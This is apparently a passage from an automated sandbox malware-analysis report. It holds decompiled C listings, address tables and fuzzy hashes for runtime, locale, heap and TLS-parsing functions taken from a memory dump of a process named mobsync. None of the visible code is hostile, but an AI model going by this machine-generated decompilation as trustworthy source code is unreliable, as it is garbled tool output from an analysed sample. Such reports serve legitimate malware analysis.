Opcode ID: 236d1fbffacee29ac2072d7646572aa4fef94a32c5531d6a83f556afadd58c04
Instruction ID: e14bd6c5a23f6b1c66d5c7ff4ee57b294b174c7bca6555511f9b3344fc2a95c0
Opcode Fuzzy Hash: 236d1fbffacee29ac2072d7646572aa4fef94a32c5531d6a83f556afadd58c04
Instruction Fuzzy Hash: CD419171A006159BEB14CF55E88579ABBF4FB04310FA0857BD805E7350E3B89964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00449143, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00449143(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x46a00c; // 0x44c884ad
				_v8 = _t16 ^ _t54;
				_t35 = E00440972(__ebx, __ecx, __edx);
				_t50 =  *(E00440972(_t35, __ecx, __edx) + 0x34c);
				_t53 = E0044921B(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = E0044C0C1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = E0044C0C1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E00449373(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return E0042F61B(_v8 ^ _t54);
			}

0x0044914e
0x00449155
0x00449163
0x0044916b
0x0044917a
0x00449186
0x00449197
0x0044919f
0x004491b0
0x004491b9
0x004491c9
0x004491db
0x004491e4
0x004491e6
0x004491e7
0x00000000
0x004491e7
0x004491e4
0x004491bb
0x004491be
0x004491f5
0x004491f5
0x004491f8
0x004491fb
0x004491c0
0x004491c0
0x004491c1
0x004491e8
0x004491e8
0x004491f3
0x00000000
0x00000000
0x004491f3
0x004491be
0x004491a1
0x004491a1
0x004491a3
0x00449218

APIs

Part of subcall function 00440972: GetLastError.KERNEL32(?,?,00434E55,?,?,?,00435444,0043609C,?,0046C238), ref: 00440976
Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409EA
Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0

Part of subcall function 00440972: _free.LIBCMT ref: 004409D1
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409DE

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00449197

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 789d0dad153cc4320abca8aa01763aa0d0be7ec271123e33cf66deee616fe839
Instruction ID: b23328cae5c81917ebfd14750ae41a33c51d25984a081319408a22a244c59ce8
Opcode Fuzzy Hash: 789d0dad153cc4320abca8aa01763aa0d0be7ec271123e33cf66deee616fe839
Instruction Fuzzy Hash: 6621C57251520BABFB289E25DC8AABB77A8EB04314F1001BBFD01C7241EB799D41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00449373, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00449373(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = E00440972(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(L00448EC7( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}

0x00449378
0x0044937b
0x00449380
0x00449383
0x004493a7
0x004493b0
0x004493da
0x004493dc
0x004493b8
0x004493b8
0x004493bb
0x004493be
0x004493be
0x004493c1
0x004493c4
0x004493d8
0x00000000
0x00000000
0x00000000
0x00000000
0x004493d8
0x004493a9
0x004493a9
0x004493a9
0x004493a9
0x004493e2

APIs

Part of subcall function 00440972: GetLastError.KERNEL32(?,?,00434E55,?,?,?,00435444,0043609C,?,0046C238), ref: 00440976
Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409EA
Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00449111,00000000,00000000,?), ref: 0044939F

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 40811807caf6546c17227227bdf3670b7bd5bc0f4587bd2d689809cdd1fb1d05
Instruction ID: e088f05e704de54da1791b93b42debfc98a9ea1916be425aaf6d46112b02c247
Opcode Fuzzy Hash: 40811807caf6546c17227227bdf3670b7bd5bc0f4587bd2d689809cdd1fb1d05
Instruction Fuzzy Hash: 4BF07D32900116BBFB285E24CC057BB7758EB46358F04442AEC15E3280EB78FD01D6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0045F930, Relevance: 1.5, Instructions: 1480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d8186419ede6822c28aae1a2ba8d923a05eb007896e94d23fa488b6550b9cf
Instruction ID: ae5820160f29e29eb5eec1e8a7b0dda23f7e29dd13900523757a5db008078bff
Opcode Fuzzy Hash: b8d8186419ede6822c28aae1a2ba8d923a05eb007896e94d23fa488b6550b9cf
Instruction Fuzzy Hash: 44B29C6244E3C45FCB178B704A7A562BF74AE1320171D86DFC8C18F9A3E219A90DD76B

Uniqueness

Uniqueness Score: -1.00%

Function 0044697D, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044697D() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x46ba48 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0044697d
0x00446985
0x0044698d

APIs

GetProcessHeap.KERNEL32 ref: 0044697D

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c8a6c7df5d08b87816ed76a02ba7c524f2a39d67e6166e759cef680a43040ea0
Instruction ID: 28f866089aaf05a4cb9890c2cb3393caa779ee160297bb8b3d9052280f0245bb
Opcode Fuzzy Hash: c8a6c7df5d08b87816ed76a02ba7c524f2a39d67e6166e759cef680a43040ea0
Instruction Fuzzy Hash: 05A001706057018B97508FBAAA4920A3AA9AA466D27158079A405C5A61EB74C9909B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3F8, Relevance: .6, Instructions: 585
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0041A3F8(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed char _v7;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v34;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				void _v72;
				void* __edi;
				void* _t251;
				void _t254;
				signed char _t272;
				void* _t274;
				intOrPtr _t275;
				intOrPtr* _t280;
				void* _t281;
				void* _t285;
				intOrPtr _t292;
				void* _t318;
				signed short _t321;
				intOrPtr _t326;
				void* _t338;
				void* _t350;
				void* _t362;
				signed char _t370;
				signed int _t371;
				intOrPtr _t374;
				intOrPtr* _t375;
				signed int _t377;
				intOrPtr _t379;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t395;
				signed int _t436;
				signed int _t438;
				signed char _t442;
				intOrPtr _t445;
				signed int _t447;
				void* _t448;
				signed char _t449;
				void* _t454;
				intOrPtr _t475;
				intOrPtr _t480;
				intOrPtr _t481;
				intOrPtr* _t482;
				intOrPtr _t483;
				intOrPtr _t484;
				intOrPtr _t485;
				signed int _t486;
				intOrPtr _t488;
				signed int _t489;
				void* _t490;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t497;

				_t375 = __ecx;
				_v12 = __edx;
				_t377 = 0xa;
				_t442 =  *(__ecx + 0x308) & 0x0000ffff;
				_t486 = 0;
				_t251 = memset( &_v72, 0, _t377 << 2);
				_t491 = _t490 + 0xc;
				 *(_t375 + 0x318) = _t251;
				_v28 = _t251;
				_v24 = _t251;
				_t480 =  *_a4;
				_v60 = _t480;
				_t379 = _t480;
				_v56 = _t379;
				if(_t442 < 0x8000) {
					L9:
					_push(0x48);
					_t254 = E0042D5FA();
					_v72 = _t254;
					if(_t254 == 0) {
						L8:
						_t486 = 0xffffff83;
						L120:
						E0041A295( &_v72);
						E004196CA(_t375);
						return _t486;
					}
					E00431810(_t480, _t254, 0, 0x48);
					_t492 = _t491 + 0xc;
					if(_t480 - _v56 + 3 > _a8) {
						L2:
						_t486 = 0xfffffeb8;
						goto L120;
					}
					E004189B4(_t480 + _v12,  &_v20);
					_t384 = _v20;
					_t481 = _t480 + 3;
					_v60 = _t481;
					_v16 = _t384;
					if(_t384 > 0x481e) {
						goto L2;
					}
					_t445 = _v56;
					if(_t384 - _t445 + _t481 != _a8) {
						goto L2;
					}
					_t385 = _v52;
					if(_t384 == 0) {
						L24:
						_v44 = _v44 & 0x00000000;
						_v48 = _t385;
						if(_t385 != 0) {
							L30:
							_v34 = _v34 & 0x0000fffb;
							_t482 = E0042D5FA();
							_v64 = _t482;
							if(_t482 == 0) {
								goto L8;
							}
							E00431810(_t482, _t482, 0, 0x370);
							_t387 = _v52;
							_t447 = 1;
							_t493 = _t492 + 0xc;
							 *(_t375 + 0x318) = 1;
							if(_t387 <= 0 || _t387 <= 1) {
								L50:
								if(_t486 != 0) {
									goto L120;
								}
								 *(_t375 + 0x318) = 2;
								if(_v48 <= _t486) {
									_t448 = 0;
									L64:
									_t449 = _t448 + 1;
									L65:
									_t389 = _v34 & _t449;
									_v24 = _t389;
									if(_t389 == 0 || _t486 == 0) {
										 *(_t375 + 0x318) = 3;
										if(_v48 <= 0) {
											L103:
											if(_v24 == 0 || _t486 == 0) {
												 *(_t375 + 0x318) = 4;
												if(_v40 != 0) {
													_t486 =  ==  ? _v40 : _t486;
												}
												_t486 = E0041A146( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t486,  &_v72);
												_t272 =  *(_t375 + 0x308) & 0x0000ffff;
												_t395 = _t272 & 0x00000080;
												if(_t395 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
													 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
													_t486 = 0;
												}
												if(_t486 == 0) {
													if((_t272 & 0x00000030) == 0x10) {
														 *((char*)(_t375 + 0x311)) = 5;
													}
												} else {
													if(_t395 == 0) {
														E0041A0E7(_t375, _t486);
													}
													 *(_t375 + 0x1f0) = _t486;
												}
												_t274 = E00418A30(_t375);
												_t275 = _v60;
												if(_t274 != 0) {
													_t275 = _t275 +  *((intOrPtr*)(_t375 + 0x300));
													_v60 = _t275;
												}
												 *(_t375 + 0x318) = 5;
												 *_a4 = _t275;
											}
											goto L120;
										}
										if( *(_t482 + 0x36c) >= 0x80) {
											if( *((intOrPtr*)(_t375 + 0x227)) == _t449 && ( *(_t375 + 0x308) & 0x00000030) == 0x10) {
												_t486 =  ==  ? 0xfffffe7f : _t486;
											}
											_t292 =  *((intOrPtr*)(_t375 + 0x228));
											if(_t292 == _t449 || _t292 == 3 &&  *((char*)(_t375 + 0x22b)) == 0) {
												_t486 =  ==  ? 0xfffffe81 : _t486;
											}
										}
										if(( *(_t482 + 0x36d) & _t449) != 0) {
											if(( *(_t375 + 0x308) & 0x00000030) != 0x10) {
												_t486 =  ==  ? 0xfffffe7e : _t486;
											} else {
												if(( *(_t482 + 0x31c) & 0x00000003) == 0) {
													_t486 = 0xfffffe7e;
												}
											}
										}
										if(_t389 == 0) {
											 *(_t375 + 0x30a) =  *(_t375 + 0x30a) | 0x00002000;
											if(( *(_t375 + 0x308) & 0x00000080) == 0) {
												_t286 =  *((intOrPtr*)(_t375 + 0xf8));
												if( *((intOrPtr*)(_t375 + 0xf8)) != 0) {
													if( *((intOrPtr*)(_t482 + 0x24)) == 0) {
														L00419FE5( *((intOrPtr*)(_t482 + 0x7c)), _t286);
														_t486 =  ==  ? 0xfffffebe : _t486;
													} else {
														_push(_t389);
														if(E0041A08D(_t286) != 1) {
															_t486 = 0xfffffebe;
														}
													}
												}
											}
											if( *((intOrPtr*)(_t482 + 0x1c)) != 0x206) {
												goto L103;
											} else {
												_v28 = _v28 & 0x00000000;
												_t280 = _t375 + 0x37c;
												_t399 =  *_t280;
												if( *_t280 != 0) {
													if( *((char*)(_t375 + 0x382)) == 0) {
														L96:
														_t281 = E00426383( *_t482,  &_v28,  *_t280,  *((intOrPtr*)(_t482 + 4)));
														if(_t281 != 0) {
															L98:
															_t486 = 0xfffffeaa;
															L99:
															if(_t486 == 0 &&  *((char*)(_t375 + 0x382)) != 0 && ( *(_t375 + 0x308) & 0x00000080) == 0) {
																E0042990C( *((intOrPtr*)(_t375 + 0x37c)));
																_t486 =  <  ? 0xfffffe66 : _t486;
															}
															goto L103;
														}
														 *((char*)(_t375 + 0x382)) = _t281 + 1;
														goto L99;
													}
													_t285 = E004196A9(_t375, _t399);
													 *((char*)(_t375 + 0x382)) = 0;
													L94:
													if(_t285 != 0) {
														goto L98;
													}
													_t280 = _t375 + 0x37c;
													goto L96;
												}
												_push(_t280);
												_t454 = 0x25;
												_t285 = E00419618(_t454);
												goto L94;
											}
										} else {
											 *(_t375 + 0x1f0) = _t486;
											goto L120;
										}
									} else {
										goto L120;
									}
								}
								_v44 = _v44 & _t486;
								_t486 = E0041A2E3(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
								if(_t486 != 0) {
									if(_t486 == 0xffffff74 || _t486 == 0xffffff7c) {
										_t482 = _v64;
										_t449 = 1;
										_v34 = _v34 | 1;
									} else {
										_t482 = _v64;
										_t449 = 1;
										if( *((intOrPtr*)(_t375 + 0x80)) == 0) {
											_v34 = _v34 | 1;
										} else {
											_v34 = _v34 ^ (_v34 >> 0x00000001 ^ _v34) & 1;
										}
									}
									goto L65;
								}
								_t482 = _v64;
								_t448 = 0;
								if((_v34 & 0x00000002) == 0) {
									_v34 = _v34 & 0x0000fffe;
									goto L64;
								} else {
									_t486 = _v40;
									_t449 = 1;
									_v34 = _v34 | 1;
									goto L65;
								}
							} else {
								do {
									_v44 = _v48 - 1;
									_t318 = E0041A2E3(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
									_t493 = _t493 + 0x10;
									if(_t318 == 0) {
										_t318 = E0041A3C0(_t375,  &_v72);
									}
									_t486 = E0041A146( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t318,  &_v72);
									_t321 =  *(_t375 + 0x308) & 0x00000080;
									if(_t321 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
										 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
										_t486 = 0;
									}
									_t482 = _v64;
									if(_t486 != 0) {
										L45:
										if(( *(_t375 + 0x308) & 0x00000080) == 0) {
											E0041A0E7(_t375, _t486);
										}
										 *(_t375 + 0x1f0) = _t486;
										if(_v40 == 0) {
											_v40 = _t486;
											_t486 = 0;
										}
										goto L49;
									}
									if(( *(_t482 + 0x36c) & 0x00000010) != 0 && _t321 == 0 && _v24 == 0) {
										_v20 = _v20 & 0x00000000;
										_t486 = L00425FF8( &_v20,  *((intOrPtr*)(_v72 + 4 + _v44 * 8)), 5,  *((intOrPtr*)(_t375 + 0x84)));
										if(_t486 < 0) {
											goto L120;
										}
										L00431DF0( *_v20,  *((intOrPtr*)(_v72 + _v44 * 8)),  *((intOrPtr*)(_v72 + 4 + _v44 * 8)));
										_t493 = _t493 + 0xc;
										_t486 =  ==  ? 0 : E0041C49B( *((intOrPtr*)( *_t375 + 0x50)),  &_v20, 2, 0);
										if(_t486 == 0) {
											goto L49;
										}
										goto L45;
									}
									L49:
									_t387 = _t482;
									L00423BB3(_t482);
									_v34 = _v34 & 0x0000fffb;
									_t447 = 1;
									_t326 = _v48 - 1;
									_v48 = _t326;
								} while (_t326 > 1);
								goto L50;
							}
						}
						if(( *(_t375 + 0x30c) & 0x00002000) != 0) {
							L28:
							if(( *(_t375 + 0x308) & 0x00000030) == 0) {
								_t486 = 0xfffffea7;
								E0041A0E7(_t375, 0xfffffea7);
							}
							goto L30;
						}
						if(( *(_t375 + 0x308) & 0x00000100) == 0) {
							goto L30;
						}
						_t338 = E00418A14( *(_t375 + 0x218) & 0x0000ffff);
						_t492 = _t492 + 4;
						if(_t338 == 0) {
							goto L30;
						}
						goto L28;
					}
					L14:
					L14:
					if(_t385 >= ( *(_t375 + 0x20e) & 0x000000ff) || _t385 >= 9) {
						_t486 = 0xfffffe90;
					} else {
						goto L16;
					}
					goto L120;
					L16:
					if(_t481 - _t445 + 3 > _a8) {
						goto L2;
					}
					E004189B4(_t481 + _v12,  &_v20);
					_t483 = _t481 + 3;
					_v60 = _t483;
					if(_v20 - _v56 + _t483 > _a8) {
						goto L2;
					}
					_t436 = _v52;
					 *((intOrPtr*)(_v72 + 4 + _t436 * 8)) = _v20;
					_t481 = _t483 + _v20;
					_v60 = _t481;
					 *((intOrPtr*)(_v72 + _t436 * 8)) = _v12 + _t483;
					_t445 = _v56;
					_t350 = 0xfffffffd;
					_v16 = _v16 + _t350 - _v20;
					if( *(_t375 + 0x308) < 0x8000) {
						L23:
						_t385 = _t436 + 1;
						_v52 = _t385;
						if(_v16 != 0) {
							goto L14;
						}
						goto L24;
					}
					if(_t481 - _t445 + 2 > _a8) {
						goto L2;
					}
					_t488 = _v12;
					E004189CE(_t481 + _t488,  &_v8);
					_t484 = _t481 + 2;
					_v60 = _t484;
					if((_v8 & 0x0000ffff) - _v56 + _t484 > _a8) {
						goto L2;
					}
					_t438 = _v52;
					_t475 = _v68;
					 *(_t475 + 4 + _t438 * 8) = _v8 & 0x0000ffff;
					_t489 = _v8 & 0x0000ffff;
					 *((intOrPtr*)(_t475 + _t438 * 8)) = _t484 + _t488;
					_t481 = _t484 + _t489;
					_t362 = 0xfffffffe;
					_v60 = _t481;
					_v16 = _v16 + _t362 - _t489;
					_t486 = L0041EF4B(_t375,  *((intOrPtr*)(_t475 + _t438 * 8)), _t497,  *(_t475 + 4 + _t438 * 8) & 0x0000ffff, 0xb, 0);
					_t492 = _t492 + 0xc;
					if(_t486 < 0) {
						goto L120;
					} else {
						_t436 = _v52;
						_t445 = _v56;
						goto L23;
					}
				}
				if(_t480 - _t379 + 1 <= _a8) {
					_t370 =  *((intOrPtr*)(_t480 + _v12));
					_t485 = _t480 + 1;
					_v7 = _t370;
					_t371 = _t370 & 0x000000ff;
					_v20 = _t371;
					_v60 = _t485;
					if(_t371 - _t379 + _t485 > _a8) {
						goto L2;
					}
					if((_t442 & 0x00000030) != 0x10 || _v7 == 0) {
						_t480 = _t485 + _v20;
						_push(0x48);
						_v60 = _t480;
						_t374 = E0042D5FA();
						_v68 = _t374;
						if(_t374 != 0) {
							goto L9;
						}
						goto L8;
					} else {
						_t486 = 0xfffffe5c;
						goto L120;
					}
				}
				goto L2;
			}

0x0041a401
0x0041a403
0x0041a40d
0x0041a40e
0x0041a415
0x0041a417
0x0041a417
0x0041a419
0x0041a41f
0x0041a422
0x0041a428
0x0041a42f
0x0041a432
0x0041a434
0x0041a43a
0x0041a4a1
0x0041a4a1
0x0041a4a4
0x0041a4a9
0x0041a4ae
0x0041a499
0x0041a49b
0x0041ab3a
0x0041ab3d
0x0041ab44
0x0041ab51
0x0041ab51
0x0041a4b5
0x0041a4bc
0x0041a4c8
0x0041a446
0x0041a446
0x00000000
0x0041a446
0x0041a4d7
0x0041a4dc
0x0041a4df
0x0041a4e2
0x0041a4e5
0x0041a4ee
0x00000000
0x00000000
0x0041a4f4
0x0041a500
0x00000000
0x00000000
0x0041a508
0x0041a50b
0x0041a62a
0x0041a62a
0x0041a633
0x0041a638
0x0041a67c
0x0041a686
0x0041a68f
0x0041a691
0x0041a696
0x00000000
0x00000000
0x0041a6a4
0x0041a6a9
0x0041a6ae
0x0041a6af
0x0041a6b2
0x0041a6ba
0x0041a81c
0x0041a81e
0x00000000
0x00000000
0x0041a824
0x0041a82e
0x0041a8cd
0x0041a8cf
0x0041a8cf
0x0041a8d0
0x0041a8d3
0x0041a8d5
0x0041a8d8
0x0041a8e6
0x0041a8ed
0x0041aa8f
0x0041aa94
0x0041aaa2
0x0041aaa9
0x0041aaad
0x0041aaad
0x0041aac3
0x0041aac5
0x0041aacf
0x0041aad5
0x0041aae7
0x0041aaee
0x0041aaee
0x0041aaf2
0x0041ab0e
0x0041ab10
0x0041ab10
0x0041aaf4
0x0041aaf7
0x0041aafd
0x0041aafd
0x0041ab02
0x0041ab02
0x0041ab19
0x0041ab20
0x0041ab23
0x0041ab25
0x0041ab2b
0x0041ab2b
0x0041ab31
0x0041ab38
0x0041ab38
0x00000000
0x0041aa94
0x0041a8fe
0x0041a906
0x0041a920
0x0041a920
0x0041a923
0x0041a92b
0x0041a94a
0x0041a94a
0x0041a92b
0x0041a953
0x0041a95f
0x0041a97d
0x0041a961
0x0041a968
0x0041a96a
0x0041a96a
0x0041a968
0x0041a95f
0x0041a983
0x0041a995
0x0041a9a7
0x0041a9a9
0x0041a9b1
0x0041a9b7
0x0041a9d9
0x0041a9e6
0x0041a9b9
0x0041a9b9
0x0041a9c9
0x0041a9cb
0x0041a9cb
0x0041a9c9
0x0041a9b7
0x0041a9b1
0x0041a9f0
0x00000000
0x0041a9f6
0x0041a9f6
0x0041a9fa
0x0041aa00
0x0041aa04
0x0041aa1a
0x0041aa36
0x0041aa40
0x0041aa49
0x0041aa54
0x0041aa54
0x0041aa59
0x0041aa5b
0x0041aa79
0x0041aa8c
0x0041aa8c
0x00000000
0x0041aa5b
0x0041aa4c
0x00000000
0x0041aa4c
0x0041aa1f
0x0041aa24
0x0041aa2b
0x0041aa2e
0x00000000
0x00000000
0x0041aa30
0x00000000
0x0041aa30
0x0041aa06
0x0041aa09
0x0041aa0c
0x00000000
0x0041aa0c
0x0041a985
0x0041a985
0x00000000
0x0041a985
0x00000000
0x00000000
0x00000000
0x0041a8d8
0x0041a834
0x0041a859
0x0041a860
0x0041a892
0x0041a8c1
0x0041a8c6
0x0041a8c7
0x0041a89c
0x0041a89c
0x0041a8a1
0x0041a8a9
0x0041a8bb
0x0041a8ab
0x0041a8b5
0x0041a8b5
0x0041a8a9
0x00000000
0x0041a892
0x0041a862
0x0041a865
0x0041a86b
0x0041a886
0x00000000
0x0041a86d
0x0041a86d
0x0041a870
0x0041a871
0x00000000
0x0041a871
0x0041a6c8
0x0041a6c8
0x0041a6cc
0x0041a6ec
0x0041a6f1
0x0041a6f6
0x0041a6fd
0x0041a6fd
0x0041a715
0x0041a723
0x0041a726
0x0041a738
0x0041a73f
0x0041a73f
0x0041a741
0x0041a746
0x0041a7d3
0x0041a7de
0x0041a7e4
0x0041a7e4
0x0041a7ed
0x0041a7f3
0x0041a7f5
0x0041a7f8
0x0041a7f8
0x00000000
0x0041a7f3
0x0041a753
0x0041a77b
0x0041a78a
0x0041a790
0x00000000
0x00000000
0x0041a7a8
0x0041a7b2
0x0041a7cb
0x0041a7d1
0x00000000
0x00000000
0x00000000
0x0041a7d1
0x0041a7fa
0x0041a7fa
0x0041a7fc
0x0041a808
0x0041a80c
0x0041a810
0x0041a811
0x0041a814
0x00000000
0x0041a6c8
0x0041a6ba
0x0041a641
0x0041a665
0x0041a66c
0x0041a66e
0x0041a677
0x0041a677
0x00000000
0x0041a66c
0x0041a64f
0x00000000
0x00000000
0x0041a659
0x0041a65e
0x0041a663
0x00000000
0x00000000
0x00000000
0x0041a663
0x00000000
0x0041a511
0x0041a51a
0x0041a877
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a529
0x0041a533
0x00000000
0x00000000
0x0041a542
0x0041a54a
0x0041a552
0x0041a558
0x00000000
0x00000000
0x0041a55e
0x0041a569
0x0041a575
0x0041a578
0x0041a57b
0x0041a57e
0x0041a581
0x0041a585
0x0041a594
0x0041a61c
0x0041a61c
0x0041a621
0x0041a624
0x00000000
0x00000000
0x00000000
0x0041a624
0x0041a5a4
0x00000000
0x00000000
0x0041a5aa
0x0041a5b3
0x0041a5bc
0x0041a5c4
0x0041a5ca
0x00000000
0x00000000
0x0041a5d0
0x0041a5d3
0x0041a5dc
0x0041a5e3
0x0041a5e7
0x0041a5ea
0x0041a5ec
0x0041a5ef
0x0041a5f2
0x0041a609
0x0041a60b
0x0041a610
0x00000000
0x0041a616
0x0041a616
0x0041a619
0x00000000
0x0041a619
0x0041a610
0x0041a444
0x0041a453
0x0041a456
0x0041a457
0x0041a45a
0x0041a45d
0x0041a464
0x0041a46a
0x00000000
0x00000000
0x0041a472
0x0041a484
0x0041a487
0x0041a48a
0x0041a48d
0x0041a492
0x0041a497
0x00000000
0x00000000
0x00000000
0x0041a47a
0x0041a47a
0x00000000
0x0041a47a
0x0041a472
0x00000000

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29dadf4b0b093e86d5596f9e3a0be414b2d9acc7bfe6e610e81c80421a2878aa
Instruction ID: 3ba6e254b7f2d4c2766406d12400661e9b1fdfca9830f8b749eaf033f3ce6608
Opcode Fuzzy Hash: 29dadf4b0b093e86d5596f9e3a0be414b2d9acc7bfe6e610e81c80421a2878aa
Instruction Fuzzy Hash: 3222F331A022099BCF15CF68C4807FEB7B5AF44314F18816BEC559B382D7389E91CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042E02D, Relevance: .5, Instructions: 504
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0042E02D(void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void _v72;
				void* _v76;
				void* _v276;
				void _v332;
				void* _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
